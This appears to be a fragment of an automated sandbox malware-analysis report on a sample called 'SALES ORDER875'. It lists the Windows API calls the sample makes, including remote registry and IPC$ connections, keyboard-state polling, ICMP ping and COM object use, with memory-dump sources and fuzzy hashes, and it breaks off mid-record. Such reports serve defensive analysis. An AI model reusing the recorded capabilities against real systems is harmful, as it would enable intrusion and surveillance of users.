                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C417272900219AADF06FBE0CD86EFE7378AF15740F1401A6F6057A092EB756F49CB61
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003E07A2
                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003E07BE
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003E07DA
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003E0804
                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 003E082C
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003E0837
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003E083C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                    • Opcode ID: 9e0dbd821c46dd7fa019ef30566c5ed0ce522706fc2f297d87dcef2282a7109b
                                                                                                                                                                                    • Instruction ID: 69cf73d868d988e39cdf2ff607c1eba37179e7075d6deff02cc7c41b5b8222dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e0dbd821c46dd7fa019ef30566c5ed0ce522706fc2f297d87dcef2282a7109b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02413672C1022DABDF16EFA4DC85DEDB778FF04340B15416AE901A71A1EB74AE44CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00403C5C
                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00403C8A
                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00403C94
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00403D2D
                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00403DB1
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00403ED5
                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00403F0E
                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,0041FB98,?), ref: 00403F2D
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00403F40
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403FC4
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403FD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                                                                    • Opcode ID: 8541a9a438d6643b5b7db58cfaea00322fc3d5cd9e06cfa20697b1f51b75a56f
                                                                                                                                                                                    • Instruction ID: 0f0245e82552661e50bd1284c8016556d825ff294261549504051d583dde695b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8541a9a438d6643b5b7db58cfaea00322fc3d5cd9e06cfa20697b1f51b75a56f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FC169716083019FD700DF28C88496BBBE9FF89745F00496EF989AB290D734ED06CB56
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003F7AF3
                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003F7B8F
                                                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 003F7BA3
                                                                                                                                                                                    • CoCreateInstance.OLE32(0041FD08,00000000,00000001,00446E6C,?), ref: 003F7BEF
                                                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003F7C74
                                                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 003F7CCC
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 003F7D57
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003F7D7A
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 003F7D81
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 003F7DD6
                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 003F7DDC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                    • Opcode ID: a9c970d58a5d12bff9c4f602abf5c3480e90f467cbe5537cb69cc030e830e1ac
                                                                                                                                                                                    • Instruction ID: 8c2f78789ac84083b837cd0e97ddc00fd838afcc0933fbe025b78d41441e40b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: a9c970d58a5d12bff9c4f602abf5c3480e90f467cbe5537cb69cc030e830e1ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CC11A75A04209AFCB15DFA4C884DAEBBF9FF49304B1584A9F9199B361D730ED41CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00415504
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00415515
                                                                                                                                                                                    • CharNextW.USER32(00000158), ref: 00415544
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00415585
                                                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0041559B
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004155AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1350042424-0
                                                                                                                                                                                    • Opcode ID: d6c180f26240e2c7dc9dd95b672521958ed358a571fb5facf96c7fa325d70b93
                                                                                                                                                                                    • Instruction ID: ea984bf1005ad1f8cc0f9766485e153d15f77af1645324fef1036a6b64c52a4a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6c180f26240e2c7dc9dd95b672521958ed358a571fb5facf96c7fa325d70b93
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD619E70900608EFDF10DF54CC84AFF7BB9EB89324F108156F925AA291D7788AC1DB69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003DFAAF
                                                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 003DFB08
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003DFB1A
                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 003DFB3A
                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 003DFB8D
                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 003DFBA1
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003DFBB6
                                                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 003DFBC3
                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003DFBCC
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003DFBDE
                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003DFBE9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                                                    • Opcode ID: 7c98d471cc6b2f34b69f4f18c15920484dd4f3cfc0fd82c6fa306ccd6313c1b0
                                                                                                                                                                                    • Instruction ID: ad131d971473f99c9ed0bf7c758f340d0954f1690c496190656ed4d49c9e5560
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c98d471cc6b2f34b69f4f18c15920484dd4f3cfc0fd82c6fa306ccd6313c1b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A0415135A042199FDB05DFA4DC949EDBBB9EF08344F00807AF946AB361C730A945CFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 003E9CA1
                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 003E9D22
                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 003E9D3D
                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 003E9D57
                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 003E9D6C
                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 003E9D84
                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 003E9D96
                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 003E9DAE
                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 003E9DC0
                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 003E9DD8
                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 003E9DEA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                    • Opcode ID: b9cb6f05a52b1e4a9894e58bd115fa20787e13ed8ea86a9625158c611506dd03
                                                                                                                                                                                    • Instruction ID: 5348eea9f8a4579c996cbecc2f0e9f66a12fe754e9df50d8d3a8b20c189a034a
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9cb6f05a52b1e4a9894e58bd115fa20787e13ed8ea86a9625158c611506dd03
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E4118305047F96DFF3297668C443F6BEE16F11304F09826BCAC6565C2DBA499C8C7A2
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 004005BC
                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 0040061C
                                                                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 00400628
                                                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00400636
                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004006C6
                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004006E5
                                                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 004007B9
                                                                                                                                                                                    • WSACleanup.WSOCK32 ref: 004007BF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                    • String ID: Ping
                                                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                                                    • Opcode ID: 0703f4f663e59d3f689fa0ffc4b1f0e05ec1b4a099cfcc8281545b1d4e0ce358
                                                                                                                                                                                    • Instruction ID: 7cec0b16326b40dfbbe513b4ae00dc7ae03901f25985881cae34e55f1e8c9e62
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0703f4f663e59d3f689fa0ffc4b1f0e05ec1b4a099cfcc8281545b1d4e0ce358
                                                                                                                                                                                    • Instruction Fuzzy Hash: 92918E35608201AFD721DF15C888F1ABBE0AF45318F1485AAF469AF7A2C738ED45CF95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                    • Opcode ID: 46657bf29203b5cb6bcdf40727b6ee26fa39145c74ee330073bf4d0fdc0b998a
                                                                                                                                                                                    • Instruction ID: dc73fa549c1c877f4f6a3b38fbd306ca36c54ea3d7aa843cd72af0b935b343ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46657bf29203b5cb6bcdf40727b6ee26fa39145c74ee330073bf4d0fdc0b998a
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD519031A005169BCB14DF68CA409BEB7A5AF65324B21422EE8A6FB3C0DB38DD41C7D4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoInitialize.OLE32 ref: 00403774
                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 0040377F
                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,0041FB78,?), ref: 004037D9
                                                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0040384C
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004038E4
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403936
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                    • Opcode ID: 8c9e1cd87e14594f679d2d2ea7434d4d5b621e6d947c930710375d3db94a84ef
                                                                                                                                                                                    • Instruction ID: a3e79fd6c52d6ac6612ce951f9a3ae0aee7528917dcd221c1ca5714a8c6e3146
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c9e1cd87e14594f679d2d2ea7434d4d5b621e6d947c930710375d3db94a84ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3461C3716083019FD311EF54C884B5BBBE8EF49701F10886AF585AB391C774EE49CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003F33CF
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003F33F0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                                                                                                    • Opcode ID: 37ce52e83be8d991ca270513a6b30b8645f73a66929cd7f338a1a6973ac05d7b
                                                                                                                                                                                    • Instruction ID: 7aa4816eb622070319ee8cb5ebb68c0cc9e361e24a43d2e08fe28684c2f4f8b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37ce52e83be8d991ca270513a6b30b8645f73a66929cd7f338a1a6973ac05d7b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF519F3190021AAADF16FBA0CD56FFEB378AF05300F2441A6F505760A2EB656F58CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                    • API String ID: 1256254125-769500911
                                                                                                                                                                                    • Opcode ID: 6efd15c1e86d91e3a15234667d91dda6b0661151bb6a9bf61db191a2b2180456
                                                                                                                                                                                    • Instruction ID: 193f6a44190912280197c89cf976384e7dc3cd84882dc95e7886b08df2a68c26
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6efd15c1e86d91e3a15234667d91dda6b0661151bb6a9bf61db191a2b2180456
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E41DA32A001779ACB236F7E88905BFF7A5AFA1754B264329E461DB2C4E735CD81C790
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 003F53A0
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003F5416
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003F5420
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 003F54A7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                                                    • Opcode ID: d1e16c08c50ddd097f4494f6d4ca990a7c3cf0a9d73ba0183093885d9437968a
                                                                                                                                                                                    • Instruction ID: 0b62fc28873264873a221650a22233eef19e5d41b2909332907403c9e28e1412
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1e16c08c50ddd097f4494f6d4ca990a7c3cf0a9d73ba0183093885d9437968a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231B375A006099FD712DF69C884BB9BBB8EF05305F15806AE605CF292D731DD82CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateMenu.USER32 ref: 00413C79
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00413C88
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00413D10
                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00413D24
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00413D2E
                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00413D5B
                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00413D63
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
